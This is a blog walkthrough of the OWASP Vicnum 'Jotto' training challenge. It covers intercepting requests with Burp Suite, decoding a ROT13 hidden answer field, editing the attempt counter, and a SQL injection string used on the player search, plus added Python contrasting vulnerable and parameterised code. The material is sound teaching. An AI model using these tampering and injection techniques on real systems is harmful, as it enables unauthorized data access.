Playing Jotto at OWASP AppSecEU 2011

Jotto... what the hack is that? Well, Jotto is part of the Vicnum project, which was developed for educational purposes to demonstrate common web vulnerabilities as part of OWASP. Jotto is actually a game. The game play: the computer thinks of a five-letter word with unique letters. After you attempt to guess the word, the computer tells you whether you guessed the word successfully, or how many of the letters in your word match the computer's word. Keep submitting five-letter words until you have guessed the computer's word. To make it more interesting, OWASP challenges the user to hack the Jotto algorithm and word database.

OK, let's start. Open your browser and play a little while with Jotto here. If you get stuck, you might read my entire post, but I suggest you try it first (as I did) before you read my article.

Since you want to read my post, I will explain how to solve the Jotto challenge. First prepare the gun: I'm using Burp Suite and an online decoder. Now, insert your nickname in the text box and start the game by pushing the play button. Next, try to guess the word that Jotto is "thinking" of. Before you start to answer, fire up Burp Suite first (I will not explain how to configure Burp Suite here; you might refer to Google on how to use it). Then submit your answer; in my case I typed aaaaa. Burp Suite will catch the POST request:

POST /cgi-bin/jotto2.pl HTTP/1.1
Host: jotto.ciphertechs.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.04 (lucid) Firefox/3.6.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jotto.ciphertechs.com/cgi-bin/jotto1.pl
Cookie: oreos=cyb3r.anbu; chipsahoy=0; mallomar=fcragren
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

userguess=aaaaa&player=cyb3r.anbu&guess=svany&oldguess=

From the information above we can see that the page sends some data to the server:

userguess=aaaaa&player=cyb3r.anbu&guess=svany&oldguess=

There are 4 variables which the page sends: userguess, which is our answer; player, which is our nickname; guess, which we don't know yet what it is; and last oldguess, which, like the guess variable, we still have no clue about. OK, next submit the answer. Luckily (in my case) Jotto said that the letter a is one of the right characters. Well, at least now I know that one of the five letters is a.
After trying around with some inputs, we can see that oldguess is a variable used to store the answer from the previous action. Now the question is, what about the guess variable? What is it exactly? I tried sending it into the Burp Suite decoder/encoder, but still got no result. Looks like it's not encoded using any method listed in Burp Suite. Next I tried the online decoder here and checked the string with all the listed encoders/decoders, one by one, and finally it showed a readable string: final. It was encoded with the ROT13 method.

Now it's time to test the string. First I turn off Burp Suite, then I set final as my answer and there it goes, Jotto said:

Congratulations bla bla bla

Well, looks like we have already passed the first challenge: reading the word (every letter). To make sure that the guess variable is the real answer for every question, let's start the game again, but now without Burp Suite. After entering the nickname, read the HTML source: inside the form tag we can find the guess variable:

<input type="hidden" name="guess" value="nohfr">

Now, go to the online decoder site and decode nohfr with the ROT13 decoder; it will show the real string, in this case abuse. Next, enter this string into the textbox and hit the GUESS button. Well done! We answered the right word.
Before you push the CONTINUE button, fire up Burp Suite again to catch what data will be sent by the page. Here is what we got:

POST /cgi-bin/jotto3.pl HTTP/1.1
Host: jotto.ciphertechs.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.04 (lucid) Firefox/3.6.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jotto.ciphertechs.com/cgi-bin/jotto2.pl
Cookie: oreos=cyb3r.anbu; chipsahoy=1; mallomar=svryq
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
player=cyb3r.anbu&cnt=1&guess=nohfr

Well, now we have another variable here: the cnt variable. To find out what it is, repeat all the steps from the beginning, then after the Congrats page set up Burp Suite, edit the cnt value to 0, forward the packet and see what happens. Surprise: obviously the cnt variable holds the counter value. Now the system tells us that we successfully answered in 0 (zero) attempts.
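Why decoding guess and editing cnt both work: the server keeps the game state in the browser's form. The following Python is an added example, not the Vicnum project's code, contrasting that flawed design with one where the word and the counter live server-side (the WORDS list, the SESSIONS store and the function names are constructed for the illustration):

```python
import codecs
import secrets

# Constructed word list in the style of the Jotto word file; the real file is not used here.
WORDS = ["abuse", "final", "token", "young"]

def decode_hidden_guess(value: str) -> str:
    """ROT13 is obfuscation, not encryption: anyone reading the page source recovers the word."""
    return codecs.decode(value, "rot13")

# --- flawed design, as observed in the challenge: game state travels in the client's form ---
def flawed_check(form: dict) -> dict:
    """The server trusts both the hidden ROT13 answer ('guess') and the attempt counter ('cnt')."""
    answer = decode_hidden_guess(form["guess"])
    return {"correct": form["userguess"] == answer, "attempts": int(form["cnt"])}

# --- hardened design: the word and the counter live server-side behind an opaque session id ---
SESSIONS = {}  # session id -> {"player", "word", "attempts"}

def start_game(player: str) -> str:
    """Return only an unguessable session id; the word never leaves the server."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"player": player, "word": secrets.choice(WORDS), "attempts": 0}
    return sid

def hardened_check(sid: str, userguess: str) -> dict:
    """Count the attempt server-side and reveal only the Jotto feedback (matching letters)."""
    game = SESSIONS[sid]  # unknown or forged id -> KeyError; there is no client state to edit
    game["attempts"] += 1
    word = game["word"]
    return {"correct": userguess == word,
            "attempts": game["attempts"],
            "matches": len(set(userguess) & set(word))}
```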

The next thing to do is to try to hack the database system. Let's try a classic way: injecting a SQL command into the Jotto query system, which here should be the player search menu. You will find the page after you send the correct answer, at exactly http://jotto.ciphertechs.com/jotto4.php
Now let's enter SQL injection strings into the input textbox. I will use

cyb3r.anbu' OR '1'='1

and here comes the result:

Search Results

You have requested results for Jotto player cyb3r.anbu' OR '1'='1 :
find the last name in the jotto file has guessed bjnfc in 2147483647 guess(es) on 2011-03-15 09:19:49
cyb3r.anbu has guessed token in 1 guess(es) on 2011-04-26 07:10:08
brokecyb3r.anbu has guessed spent in 0 guess(es) on 2011-04-26 05:22:29
brokecyb3r.anbu has guessed image in 0 guess(es) on 2011-04-26 05:17:07
guessedcyb3r.anbu has guessed young in 0 guess(es) on 2011-04-26 04:42:25
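The search returned every row, including the hidden hint, because the player name is concatenated straight into the SQL. The following Python is an added example, not the Vicnum project's code: it models the player search against a constructed SQLite table (rows modelled on the result above) and runs the same payload against a string-built query and a parameterised one:

```python
import sqlite3

# Constructed rows in the shape of the search results above; the real table is not used here.
ROWS = [
    ("find the last name in the jotto file", "bjnfc", 2147483647, "2011-03-15 09:19:49"),
    ("cyb3r.anbu", "token", 1, "2011-04-26 07:10:08"),
    ("another.player", "magic", 3, "2011-04-26 06:00:00"),
]

# The injection string used on the page.
PAYLOAD = "cyb3r.anbu' OR '1'='1"

def make_db() -> sqlite3.Connection:
    """Build an in-memory table with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE jotto (player TEXT, word TEXT, guesses INTEGER, played_at TEXT)")
    con.executemany("INSERT INTO jotto VALUES (?, ?, ?, ?)", ROWS)
    return con

def search_vulnerable(con: sqlite3.Connection, player: str) -> list:
    """String-built WHERE clause: the quote in the input ends the literal and OR '1'='1' is evaluated."""
    sql = f"SELECT player, word, guesses, played_at FROM jotto WHERE player = '{player}'"
    return con.execute(sql).fetchall()

def search_parameterised(con: sqlite3.Connection, player: str) -> list:
    """Bound parameter: the entire input is compared as one string value, quotes included."""
    sql = "SELECT player, word, guesses, played_at FROM jotto WHERE player = ?"
    return con.execute(sql, (player,)).fetchall()

def format_results(rows: list) -> list:
    """Render rows the way the Jotto results page does."""
    return [f"{p} has guessed {w} in {g} guess(es) on {t}" for p, w, g, t in rows]
```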

OK good, this is a good sign for us. At first, I got a little confused here. After reading the result repeatedly, I finally started to understand what to do next. Pay attention to the second line of the result:

find the last name in the jotto file has guessed bjnfc in 2147483647 guess(es) on 2011-03-15 09:19:49

Using the ROT13 decoder, I decoded the bjnfc string, which produces the string owasp. OK, now I have the string; what next? I had a little problem here, but then I realised that the statement says find the last name in the jotto file, so now I need to search for that Jotto file. Again I started Burp Suite and ran the spider tool against the Jotto site. After a while, the spider finally showed a good result: it found a file named jotto inside the website:

http://jotto.ciphertechs.com/jotto/jotto

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 09:06:27 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.1 with Suhosin-Patch
Last-Modified: Thu, 14 Apr 2011 14:18:39 GMT
ETag: "2c807c-b4-4a0e19a05cdc0"
Accept-Ranges: bytes
Content-Length: 180
Connection: close
Content-Type: text/plain

about
abuse
basic
black
broke
brown
clean
clear
field
final
image
index
macro
magic
major
opera
prize
probe
prove
proxy
right
slave
token
virus
white
worms
yield
young
owasp
broke

Nice!! OK, from the statement we should look at the last word after the owasp string, so it's going to be broke! Next I tried to put the string into the player input and ran the application as before, but nothing happened with the player list. With some trial and error I tried the string combined with my nickname, brokecyb3r.anbu, loaded the player list again, and there is my nickname. Congrats to you, now your nickname is already listed on the hall of fame page 😛 *LOL


About Spentera

We are specializing in penetration test, vulnerability assessment, computer forensics, as well as intrusion analyst and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use Contact Our Team menu on the sidebar.